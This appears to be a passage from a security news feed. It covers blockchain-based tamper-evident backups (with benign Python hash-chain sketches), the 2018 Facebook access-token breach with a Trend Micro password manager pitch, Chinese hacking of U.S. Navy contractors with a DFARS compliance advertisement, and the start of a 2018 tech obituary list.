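b2 = make_block(block_hash(b1), ["photo.png added"])
chain = [genesis, b1, b2]

print(verify_chain(chain))              # True
b1["changes"].append("silent edit")     # tamper with an old block
print(verify_chain(chain))              # False: b2's prev_hash no longer matches
```

The point of the sketch is the last two lines: altering any historical block changes its hash, which breaks the link from every block after it, so tampering cannot go unnoticed.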

Since every node has access to the list of changes, the process is completely transparent. Every transaction is recorded, and adding a fingerprint hardens the process against tampering. The architecture of the blockchain makes it computationally infeasible to manipulate past blocks, and it takes consensus from the nodes to create a legal “fork.”

“Fork” is the term for a situation where two or more valid chains of blocks exist; more precisely, where two blocks of the same height (the same position in the chain) exist at the same time. In a normal situation, the majority settles on one block as the foundation for the rest of the chain, and the other fork is abandoned. Sometimes forks are created on purpose to split off a chain for a change in protocol. These are called “hard forks.”

Possible additional features

Timestamps: A backup method using this kind of blockchain technology could also serve as legal proof that a document has not been changed since the time it was included in the backups.

History of changes: A similar method can also be used to keep track of the authorized changes that were made to a document, and record when they took place and who made them.
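A rough sketch of what such a timestamped, attributed change record might look like (the field names and layout here are hypothetical, chosen only for illustration):

```python
import hashlib
import time

def change_record(path: str, contents: bytes, author: str) -> dict:
    """A hypothetical audit entry: who changed which file, when,
    and the hash of the file's contents at that moment."""
    return {
        "path": path,
        "sha256": hashlib.sha256(contents).hexdigest(),
        "author": author,
        "timestamp": int(time.time()),
    }

record = change_record("contract.pdf", b"...signed terms...", "alice")

# Once this record is anchored in a block, a matching copy of the document
# provably existed in this exact form no later than the block's timestamp.
later_copy = b"...signed terms..."
print(hashlib.sha256(later_copy).hexdigest() == record["sha256"])  # True
```

Note that only the hash needs to go on the chain; the document itself can stay private, which matters for the data-sharing concerns discussed below.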


Companies looking to deploy blockchain technology to create secure backups need to heed a few pitfalls, especially if they intend to limit the number of nodes to keep them inside the company.

Small networks are vulnerable to majority attacks. Blockchain technology is constructed so that the majority decides, and if you can find a way to supply more than half of the computing power active on the network, you can create your own false fork. In cryptocurrencies, such an attack can allow double spending, which leaves one receiving end out in the cold. Some cryptocurrencies, like Bitcoin Gold (BTG), have found out the hard way that these so-called 51 percent attacks can work; the attacks cost exchanges several million dollars.

Another possible problem with keeping the number of nodes small is the Sybil attack, which happens when a node in a network uses multiple identities. This can allow an attacker to outvote honest nodes by controlling or creating a majority. Whereas a 51 percent attack is based solely on computing power, some networks use a factor called “reputation” as an additional weighting factor for the influence of the nodes.

Sybil attack: a single operator controls multiple Sybil nodes in an attempt to gain total control of the network. Image courtesy of CoinCentral.

User behavior is always a concern. You can create the safest backup system, but a disgruntled employee could frustrate the whole effort. And insiders do not even have to have bad motives to corrupt the system. They may do it out of ignorance or with the best intentions. They may want to sweep something under the rug and unwittingly remove or corrupt more than they expected.

Deleted files could be a problem in some setups. Having the hash of a deleted file and the date it was removed may not always be enough: even if you know when and by whom a file was deleted, that will not bring it back. Depending on how the backup system is set up, this may be solved with some digging in old backups, or the file may be lost forever.

The underlying question is: do you want every version of every document to be available at all times, or is it okay to have the original and the latest version with a historical overview of when it was changed and by whom? Ideally there is some middle ground, for example, complete backups once a year with incremental backups handled by the blockchain.
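That middle ground, a full backup plus a series of incremental changes, can be illustrated with a small Python sketch. The data layout is hypothetical: each increment maps a file path to new contents, or to None for a deletion.

```python
def restore(full_backup: dict, increments: list) -> dict:
    """Rebuild the current state from the last full backup plus
    incremental change sets, applied oldest-first."""
    state = dict(full_backup)
    for delta in increments:
        for path, contents in delta.items():
            if contents is None:
                state.pop(path, None)   # file was deleted in this increment
            else:
                state[path] = contents  # file was added or modified
    return state

full = {"a.txt": "v1", "b.txt": "v1"}
deltas = [{"a.txt": "v2"}, {"b.txt": None}, {"c.txt": "v1"}]
print(restore(full, deltas))  # {'a.txt': 'v2', 'c.txt': 'v1'}
```

This also makes the deleted-files trade-off above concrete: b.txt is recoverable only as long as the yearly full backup containing it is retained; the chain itself records only that, and when, it was removed.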

Large node networks

To prevent any type of majority attack, companies could decide to use larger, established networks like the Ethereum Project, but this may collide with policies against sharing any kind of data outside their own network. Even if only the hashes and timestamps of the filesystem are shared, this could clue others into what’s going on. And the costs for the nodes calculating the hashes (the miners) could prove higher than those of current backup solutions.

So when can we expect to see this happening?

I think we will see more progress in this field in the near future. Incremental backups and keeping track of changes have blockchain written all over them. But a viable solution should have a large network behind it, and there are other pitfalls to keep in mind when designing and setting up such a backup system. It may not yet be ready to serve as your only solution, but combining incremental backups on a blockchain with full backups at set intervals seems an ideal fit.

The post Using the blockchain to create secure backups appeared first on Malwarebytes Labs.

Why it’s Time to Switch from Facebook Login to a Password Manager

Social media sites are increasingly the focus of our digital lives. Not only do we share, interact, and post on platforms like Facebook, we also use these sites to quickly log into our favorite apps and websites. But what happens when these social media gatekeepers are hacked? A while back, Facebook suffered a major attack in which hackers obtained the digital keys to at least 30 million accounts (originally thought to be 50 million), exposing highly sensitive personal details.

The attack not only gave the bad guys access to the Facebook accounts but raised the prospect of them also being able to access any linked apps or websites. The message is clear: it may be time to store log-ins for these third-party accounts in a password manager, rather than a frequently targeted social media company.

What happened, exactly?

As a Facebook user, you’re probably well aware of the ease-of-use benefit of logging in to your third-party website and application accounts using your Facebook credentials. Known as Facebook Connect, this is a “Single Sign-On” (SSO) feature: a fast, simple, and straightforward way to log in to your various accounts, so you don’t have to remember a different password for every site and app.

Convenient, eh? But here’s the problem. At the end of September 2018, Facebook discovered a major security issue: attackers managed to steal the crucial access tokens that act as “digital keys” to keep you logged into the site without having to re-enter your password each time you use Facebook. These keys also provide access to all the third-party applications and websites you log into via Facebook: everything from Airbnb and Amazon to Tinder and your favorite news apps. Since there’s a chance the bad guys were also able to illegally access these, they may have been able to gather more of your sensitive info across these accounts to commit identity theft, and thereby gain access to your credit cards as well.

How did the hackers grab these all-important access tokens? By exploiting several bugs in Facebook’s “View As” and video posting features. (View As is a feature that allows users to see what their own profile looks like to someone else.) They ultimately stole access tokens for 30 million users: for 15 million, they accessed just name and contact details; for 14 million, virtually all profile info, including name, contact details, username, gender, language, relationship status, religion, and more; and for the remaining 1 million, no info at all.

Facebook has been quick to point out that there are currently no signs the attackers accessed any third-party apps using Facebook SSO. However, that may change, and it doesn’t alter the fact that a similar incident, or worse, could happen in the future. Social media and web providers like Facebook are a major target for attackers, and human error will inevitably lead to some security mistakes. A bug in Google’s code recently exposed the data of 500,000 users of its Google+ social platform, prompting Google’s decision to shut down the consumer side of the site within the next 10 months (as of October 2018).

How can I stay safe?


Facebook has fixed the bugs in question and reset the access tokens of those affected by this breach, which should help to stop future attacks. However, if your account was illegally accessed in the attack, there are a few steps you should take:

  • Visit this link to get a yes or no answer on whether you were affected.
  • Be on the lookout for scams: Fraudsters may call, email or send you messages using the info they’ve obtained from the breach.
  • Beware of phishing emails: scammers might try to capitalize on the notoriety of the incident to get you to part with sensitive info, by sending emails pretending to come from Facebook. Here’s how to confirm if they’re real or not.
  • You may need to call your bank: if you were in the group of 14 million users whose full profile info was taken, the hackers may have enough personal info on you to answer security questions and access your accounts. Consider adding further layers of security.

Take preventative steps

After the above, consider the following options to keep all your accounts secure going forward:

  • Disable Facebook SSO. Go to your Facebook settings and remove all apps under Active Apps and Websites. Then, under Apps, Websites and Games, go to Preferences, click Edit, then Turn Off.
  • Switch on two-factor authentication: this adds an extra layer of security to your Facebook log-in. Visit Facebook’s Settings > Security and Login > Setting Up Extra Security > Use two-factor authentication.
  • Consider Facebook’s app password generator: If you wish to maintain app and website connections, this function lets you generate unique passwords for your linked apps and websites, instead of using the Facebook SSO password. However, these passwords can’t be stored in a password manager, and if you log out of the app, you’ll have to generate a fresh password.
  • Better yet, invest in a password manager to securely generate and store strong and unique passwords for each of your Facebook linked apps and websites.

Will it affect my use of Facebook?

If you disable Facebook SSO there may be some loss of sharing functionality. For example, you might find that you can’t post/share articles from within news apps direct to Facebook, and instead have to cut and paste the link manually. It will depend, however, on the apps you’re using. At the end of the day, you need to decide what’s more important to you: tighter integration between apps/websites and Facebook, or keeping your passwords in a separate, secure place away from the social media company.

How can Trend Micro help?

Trend Micro Password Manager can help you protect the privacy and security of your app and website account passwords across PCs and Macs, and Android and iOS mobile devices. Use it as a highly user-friendly but more secure alternative to Facebook SSO. Trend Micro Password Manager:

  • Generates highly secure, unique, and tough-to-hack passwords for each of your online accounts.
  • Securely stores and replays these credentials for log-ins, so you don’t have to remember them.
  • Offers an easy way to change passwords, if any do end up being leaked or stolen.
  • Makes it quick and easy to manage your passwords from any location, on any device and browser.
  • Works across both apps and websites, with particular benefit for apps you use in conjunction with Facebook on your mobile devices.

For more information, or to purchase the product, go to our Trend Micro Password Manager website. Note that Trend Micro Password Manager is automatically installed with Trend Micro Maximum Security.


Chinese Hackers Pose a Serious Threat to Military Contractors

Chinese hackers have successfully breached contractors for the U.S. Navy, according to a WSJ report.

The years-long Marriott Starwood database breach was almost certainly the work of nation-state hackers sponsored by China, likely as part of a larger campaign by Chinese hackers to breach health insurers and government security clearance files, The New York Times reports. Why would foreign spies be so interested in the contents of a hotel’s guest database? Turns out “Marriott is the top hotel provider for American government and military personnel.” The Starwood database contained a treasure trove of highly detailed information about these personnel’s movements around the world.

Chinese hackers didn’t stop there. According to a report published in the Wall Street Journal last week, nation-state hackers sponsored by China have successfully breached numerous third-party contractors working for the U.S. Navy on multiple occasions over the past 18 months. The data stolen included highly classified information about advanced military technology currently under development, including “secret plans to build a supersonic anti-ship missile planned for use by American submarines.” The WSJ noted that hackers specifically targeted third-party federal contractors because many are small firms that lack the financial resources to invest in robust cyber security defenses.

In testimony before a Senate Judiciary Committee hearing on Wednesday, FBI counterintelligence division head E.W. “Bill” Priestap called cyberespionage on the part of Chinese hackers the “most severe” threat to American security, citing the country’s “relentless theft of U.S. assets” in an effort to “supplant [the United States] as the world’s superpower.”

Inconsistent security practices leave U.S. Ballistic Missile Defense System vulnerable to cyber attacks

While the Navy has been hit particularly hard, the entire U.S. government, including all branches of the military, is under constant threat of cyber attack from Chinese hackers and other nation-state actors, and it is ill-prepared to fend off these attacks. Around the same time the Marriott Starwood breach was disclosed, the Defense Department Office of Inspector General (OIG) released an audit report citing inconsistent security practices at DoD facilities that store technical information on the nation’s ballistic missile defense system (BMDS), including facilities managed by third-party contractors. The report described failures to enact basic security measures, such as:

  • Requiring the use of multifactor authentication to access BMDS technical information
  • Identifying and mitigating known network vulnerabilities
  • Locking server racks
  • Protecting and monitoring classified data stored on removable media
  • Encrypting transmissions of BMDS technical information
  • Implementing intrusion detection capabilities on classified networks
  • Requiring written justification to obtain and elevate system access for users
  • Consistently implementing physical security controls to limit unauthorized access to facilities that manage BMDS technical information

Cyber security problems abound among DoD and other federal contractors

The OIG report comes on the heels of another the office issued earlier this year, citing security problems specifically at contractor-run military facilities. The WSJ report on Chinese hackers implied that inadequate security is the norm, not the exception, at federal contractors and subcontractors, citing an intelligence official who described military subcontractors as “lagging behind in cybersecurity and frequently [suffering] breaches” that impact not just the military branch they work for, but also other branches.

In theory, military contractors shouldn’t be having these problems. Most federal contractors must comply with the strict security controls outlined in NIST 800-171, and DoD contractors must comply with DFARS 800-171. DoD contractors were required to have, at minimum, a “system security plan” in place by December 31, 2017. Many small and mid-sized organizations missed that deadline, however, often because they felt they did not have the resources to comply. Continued non-compliance puts these vendors’ contracts at risk of cancellation, and national security at risk from Chinese hackers and other cyber criminals.

It’s not too late to begin compliance efforts. If your agency starts working towards compliance now, you can demonstrate to your prime contractor, subcontractor, or DoD contracting officer that you have a plan to comply and are making progress with it.

Affordable DFARS 800-171 compliance services are available for small and mid-sized federal contractors

Continuum GRC’s IT Audit Machine (ITAM) greatly simplifies the compliance process and significantly cuts the time and costs involved, putting NIST 800-171 and DFARS 800-171 compliance within reach of small and mid-sized organizations. Additionally, Continuum GRC has partnered with Gallagher Affinity to offer small and mid-sized federal contractors affordable packages that combine cyber and data breach insurance coverage with NIST 800-171 and DFARS 800-171 compliance services.

The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.

Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.


Tech luminaries we lost in 2018

Remembering our industry’s innovators

They were the founders of such household names as Atari and Microsoft. They built the hardware and software that powers the Internet. They used computers to give voice to the young and the disabled. And they rarely did so in the spotlight. Whether they ever achieved fame or fortune, these 13 women and men deserve a place in the history books for their lives, accomplishments, and contributions to science and information technology around the world.
